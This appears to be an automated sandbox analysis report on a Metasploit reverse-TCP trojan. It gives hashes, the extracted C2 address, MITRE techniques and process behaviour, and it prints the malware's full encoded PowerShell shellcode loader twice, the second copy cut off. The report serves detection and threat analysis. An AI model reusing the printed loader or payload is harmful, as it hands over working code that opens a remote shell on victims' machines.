metasploit | 6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517

General

Target

6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe
Size

118KB
MD5

e656536f9ea974740acbe4a763b8a8fe
SHA1

ea8f2d6a56b330470c41602386fc350cfdce4278
SHA256

6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517
SHA512

27d370402c843223c15f5b73e73e586e264460f432213b0ea6bc665306ab3e80c5a2851dc5ce48862bb3f8f3a1ea44d9254b7f7f5c081b60d4cf8b2472efe019
SSDEEP

1536:1jke9WIvVkcjVZx0A2gbwgObwf9PZWtv9oph/kSbIJwenruENm/3G4GhYo1dim:1Ie9WIv5RZHMiDour9m

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.180.129:1111

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3020 powershell.exe
2572 powershell.exe

pid	process
3020	powershell.exe
2572	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3020 powershell.exe
3020 powershell.exe
2572 powershell.exe
2572 powershell.exe
1896 powershell.exe
1896 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3020 powershell.exe
Token: SeDebugPrivilege 2572 powershell.exe
Token: SeDebugPrivilege 1896 powershell.exe

pid	process
3020	powershell.exe
3020	powershell.exe
2572	powershell.exe
2572	powershell.exe
1896	powershell.exe
1896	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 1728 wrote to memory of 3020	1728	6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe	powershell.exe
PID 1728 wrote to memory of 3020	1728	6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe	powershell.exe
PID 3020 wrote to memory of 2572	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 2572	3020	powershell.exe	powershell.exe
PID 2572 wrote to memory of 1896	2572	powershell.exe	powershell.exe
PID 2572 wrote to memory of 1896	2572	powershell.exe	powershell.exe
PID 2572 wrote to memory of 1896	2572	powershell.exe	powershell.exe
PID 1896 wrote to memory of 2348	1896	powershell.exe	csc.exe
PID 1896 wrote to memory of 2348	1896	powershell.exe	csc.exe
PID 1896 wrote to memory of 2348	1896	powershell.exe	csc.exe
PID 2348 wrote to memory of 2148	2348	csc.exe	cvtres.exe
PID 2348 wrote to memory of 2148	2348	csc.exe	cvtres.exe
PID 2348 wrote to memory of 2148	2348	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe
"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABBADIAVgAgAD0AIAAnACQAUAB5AHgAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AHgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADEAOQAsADAAeABhAGIALAAwAHgAYQA4ACwAMAB4AGEAYwAsADAAeABkADkALAAwAHgAZQBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABmADMALAAwAHgANQA3ACwAMAB4ADQAYQAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAYQAyACwAMAB4AGYAZgAsADAAeAA5ADAALAAwAHgANwBiACwAMAB4ADkAMgAsADAAeAAyAGQALAAwAHgAZgA0ACwAMAB4AGYAMAAsADAAeAA4ADYALAAwAHgAZQAxACwAMAB4ADcAYwAsADAAeABlADMALAAwAHgAYQBjACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4AGUAMAAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAANQAsADAAeAAyAGQALAAwAHgANQA2ACwAMAB4AGUAOQAsADAAeABlADUALAAwAHgAOQBhACwAMAB4AGQAMgAsADAAeAAzADMALAAwAHgAYwBiACwAMAB4ADIANAAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADQAYQAsADAAeABkADkALAAwAHgAOABjACwAMAB4ADUANAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeABhADkALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYwA3ACwAMAB4ADQAMgAsADAAeABmAGIALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjAGYALAAwAHgAZQBjACwAMAB4ADcANAAsADAAeABmADAALAAwAHgAZAAzACwAMAB4ADAAZAAsADAAeAA1AGEALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAYwBhACwAMAB4AGQAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADUAOQAsADAAeABhADgALAAwAHgAMAA5ACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAMAA4ACwAMAB4ADIAYgAsADAAeAA2AGUALAAwAHgAMwAzACwAMAB4ADgAMQAsADAAeAA1AGYALAAwAHgAYQBjACwAMAB4ADAAZAAsADAAeABlAGUALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeAA1ADkALAAwAHgAOQBiACwAMAB4AGUAYgAsADAAeAA4ADEALAAwAHgAOQAzACwAMAB4ADUAYgAsADAAeAAyAGEALAAwAHgAZQAyACwAMAB4AGQAOQAsADAAeABmADcALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4AGQAYQAsADAAeAAzADAALAAwAHgAMQA5ACwAMAB4ADkAYQAsADAAeABkAGMALAAwAHgAOAAyACwAMAB4ADYAMwAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADEANQAsADAAeABjADMALAAwAHgAMAAzACwAMAB4AGMAYQAsADAAeABmADEALAAwAHgAZgA1ACwAMAB4AGMAMAAsADAAeAA4AGQALAAwAHgANwAyACwAMAB4AGYAOQAsADAAeABhAGQALAAwAHgAZABhACwAMAB4AGQAZAAsADAAeAAxAGUALAAwAHgAMwAwACwAMAB4ADAAZQAsADAAeAA1ADYALAAwAHgAMQBhACwAMAB4AGIAOQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAYQAsADAAeABmADkALAAwAHgAOQA1ACwAMAB4ADEAZAAsADAAeABmADYALAAwAHgANQBhACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgANQAyACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADMAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEAMwAsADAAeABhADkALAAwAHgAZQA1ACwAMAB4ADEAMQAsADAAeABkAGMALAAwAHgAMwAxACwAMAB4ADAAYQAsADAAeAA0AGMALAAwAHgANABiACwAMAB4AGYAZAAsADAAeABjADYALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeAA2ADkALAAwAHgANQAxACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAMwA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgAZgAxACwAMAB4AGIAZgAsADAAeABkADcALAAwAHgANABjACwAMAB4ADgAMwAsADAAeABhADgALAAwAHgAZQA4ACwAMAB4ADgAMwAsADAAeAAyAGIALAAwAHgAYgA4ACwAMAB4ADEANwAsADAAeAAyADQALAAwAHgANABjACwAMAB4ADkAMAAsADAAeABkADMALAAwAHgANwAwACwAMAB4ADEAYwAsADAAeAA4AGEALAAwAHgAZgAyACwAMAB4AGYAOAAsADAAeABmADcALAAwAHgANABhACwAMAB4AGYAYgAsADAAeAAyAGMALAAwAHgANgBkACwAMAB4ADQAMQAsADAAeAA2AGIALAAwAHgAMABmACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeAAxADkALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAOQA0ACwAMAB4AGUAYwAsADAAeABhADAALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeABhADAALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABiADcALAAwAHgAMQAwACwAMAB4AGUAOAAsADAAeAAwADUALAAwAHgAMwA4ACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgAMgA2ACwAMAB4ADkAMgAsADAAeABlADcALAAwAHgAYQAyACwAMAB4AGMAOQAsADAAeAA0AGIALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA3ADMALAAwAHgAZAA2ACwAMAB4ADIAYgAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAMwBiACwAMAB4AGYANgAsADAAeABlADMALAAwAHgAYQA2ACwAMAB4AGYANQAsADAAeABmAGYALAAwAHgAOABlACwAMAB4AGIANAAsADAAeAA2ADEALAAwAHgAZgAwACwAMAB4AGMANAAsADAAeABlADcALAAwAHgAMgA3ACwAMAB4ADAAZgAsADAAeABmADMALAAwAHgAOAAyACwAMAB4AGMANwAsADAAeAA4ADUALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeAA5ADAALAAwAHgAMwAxACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAZAA2ACwAMAB4ADkAZAAsADAAeABmAGMALAAwAHgANQA3ACwAMAB4ADYAZAAsADAAeAAxADcALAAwAHgANgA5ACwAMAB4ADEAOAAsADAAeAAxADkALAAwAHgANQA4ACwAMAB4ADcAZAAsADAAeAA5ADgALAAwAHgAZAA5ACwAMAB4ADAAZQAsADAAeAAxADcALAAwAHgAOQA4ACwAMAB4AGIAMQAsADAAeABmADYALAAwAHgANAAzACwAMAB4AGMAYgAsADAAeABhADQALAAwAHgAZgA4ACwAMAB4ADUAOQAsADAAeAA3AGYALAAwAHgANwA1ACwAMAB4ADYAZAAsADAAeAA2ADIALAAwAHgAZAA2ACwAMAB4ADIAYQAsADAAeAAyADYALAAwAHgAMABhACwAMAB4AGQANAAsADAAeAAxADUALAAwAHgAMAAwACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANwAwACwAMAB4ADkAMAAsADAAeABlADkALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABlADYALAAwAHgAMAAzACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZABPAEgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGQATwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABkAE8ASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEAMgBWACkAKQA7ACQASQA5AE0AOQAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdABjAFUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB0AGMAVQAgACQASQA5AE0AOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABJADkATQA5ACAAJABlACIAOwB9AA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABBADIAVgAgAD0AIAAnACQAUAB5AHgAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AHgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADEAOQAsADAAeABhAGIALAAwAHgAYQA4ACwAMAB4AGEAYwAsADAAeABkADkALAAwAHgAZQBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABmADMALAAwAHgANQA3ACwAMAB4ADQAYQAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAYQAyACwAMAB4AGYAZgAsADAAeAA5ADAALAAwAHgANwBiACwAMAB4ADkAMgAsADAAeAAyAGQALAAwAHgAZgA0ACwAMAB4AGYAMAAsADAAeAA4ADYALAAwAHgAZQAxACwAMAB4ADcAYwAsADAAeABlADMALAAwAHgAYQBjACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4AGUAMAAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAANQAsADAAeAAyAGQALAAwAHgANQA2ACwAMAB4AGUAOQAsADAAeABlADUALAAwAHgAOQBhACwAMAB4AGQAMgAsADAAeAAzADMALAAwAHgAYwBiACwAMAB4ADIANAAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADQAYQAsADAAeABkADkALAAwAHgAOABjACwAMAB4ADUANAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeABhADkALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYwA3ACwAMAB4ADQAMgAsADAAeABmAGIALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjAGYALAAwAHgAZQBjACwAMAB4ADcANAAsADAAeABmADAALAAwAHgAZAAzACwAMAB4ADAAZAAsADAAeAA1AGEALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAYwBhACwAMAB4AGQAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADUAOQAsADAAeABhADgALAAwAHgAMAA5ACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAMAA4ACwAMAB4ADIAYgAsADAAeAA2AGUALAAwAHgAMwAzACwAMAB4ADgAMQAsADAAeAA1AGYALAAwAHgAYQBjACwAMAB4ADAAZAAsADAAeABlAGUALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeAA1ADkALAAwAHgAOQBiACwAMAB4AGUAYgAsADAAeAA4ADEALAAwAHgAOQAzACwAMAB4ADUAYgAsADAAeAAyAGEALAAwAHgAZQAyACwAMAB4AGQAOQAsADAAeABmADcALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4AGQAYQAsADAAeAAzADAALAAwAHgAMQA5ACwAMAB4ADkAYQAsADAAeABkAGMALAAwAHgAOAAyACwAMAB4ADYAMwAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADEANQAsADAAeABjADMALAAwAHgAMAAzACwAMAB4AGMAYQAsADAAeABmADEALAAwAHgAZgA1ACwAMAB4AGMAMAAsADAAeAA4AGQALAAwAHgANwAyACwAMAB4AGYAOQAsADAAeABhAGQALAAwAHgAZABhACwAMAB4AGQAZAAsADAAeAAxAGUALAAwAHgAMwAwACwAMAB4ADAAZQAsADAAeAA1ADYALAAwAHgAMQBhACwAMAB4AGIAOQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAYQAsADAAeABmADkALAAwAHgAOQA1ACwAMAB4ADEAZAAsADAAeABmADYALAAwAHgANQBhACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgANQAyACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADMAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEAMwAsADAAeABhADkALAAwAHgAZQA1ACwAMAB4ADEAMQAsADAAeABkAGMALAAwAHgAMwAxACwAMAB4ADAAYQAsADAAeAA0AGMALAAwAHgANABiACwAMAB4AGYAZAAsADAAeABjADYALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeAA2ADkALAAwAHgANQAxACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAMwA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgAZgAxACwAMAB4AGIAZgAsADAAeABkADcALAAwAHgANABjACwAMAB4ADgAMwAsADAAeABhADgALAAwAHgAZQA4ACwAMAB4ADgAMwAsADAAeAAyAGIALAAwAHgAYgA4ACwAMAB4ADEANwAsADAAeAAyADQALAAwAHgANABjACwAMAB4ADkAMAAsADAAeABkADMALAAwAHgANwAwACwAMAB4ADEAYwAsADAAeAA4AGEALAAwAHgAZgAyACwAMAB4AGYAOAAsADAAeABmADcALAAwAHgANABhACwAMAB4AGYAYgAsADAAeAAyAGMALAAwAHgANgBkACwAMAB4ADQAMQAsADAAeAA2AGIALAAwAHgAMABmACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeAAxADkALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAOQA0ACwAMAB4AGUAYwAsADAAeABhADAALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeABhADAALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABiADcALAAwAHgAMQAwACwAMAB4AGUAOAAsADAAeAAwADUALAAwAHgAMwA4ACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgAMgA2ACwAMAB4ADkAMgAsADAAeABlADcALAAwAHgAYQAyACwAMAB4AGMAOQAsADAAeAA0AGIALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA3ADMALAAwAHgAZAA2ACwAMAB4ADIAYgAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAMwBiACwAMAB4AGYANgAsADAAeABlADMALAAwAHgAYQA2ACwAMAB4AGYANQAsADAAeABmAGYALAAwAHgAOABlACwAMAB4AGIANAAsADAAeAA2ADEALAAwAHgAZgAwACwAMAB4AGMANAAsADAAeABlADcALAAwAHgAMgA3ACwAMAB4ADAAZgAsADAAeABmADMALAAwAHgAOAAyACwAMAB4AGMANwAsADAAeAA4ADUALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeAA5ADAALAAwAHgAMwAxACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAZAA2ACwAMAB4ADkAZAAsADAAeABmAGMALAAwAHgANQA3ACwAMAB4ADYAZAAsADAAeAAxADcALAAwAHgANgA5ACwAMAB4ADEAOAAsADAAeAAxADkALAAwAHgANQA4ACwAMAB4ADcAZAAsADAAeAA5ADgALAAwAHgAZAA5ACwAMAB4ADAAZQAsADAAeAAxADcALAAwAHgAOQA4ACwAMAB4AGIAMQAsADAAeABmADYALAAwAHgANAAzACwAMAB4AGMAYgAsADAAeABhADQALAAwAHgAZgA4ACwAMAB4ADUAOQAsADAAeAA3AGYALAAwAHgANwA1ACwAMAB4ADYAZAAsADAAeAA2ADIALAAwAHgAZAA2ACwAMAB4ADIAYQAsADAAeAAyADYALAAwAHgAMABhACwAMAB4AGQANAAsADAAeAAxADUALAAwAHgAMAAwACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANwAwACwAMAB4ADkAMAAsADAAeABlADkALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABlADYALAAwAHgAMAAzACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZABPAEgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGQATwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABkAE8ASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEAMgBWACkAKQA7ACQASQA5AE0AOQAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlA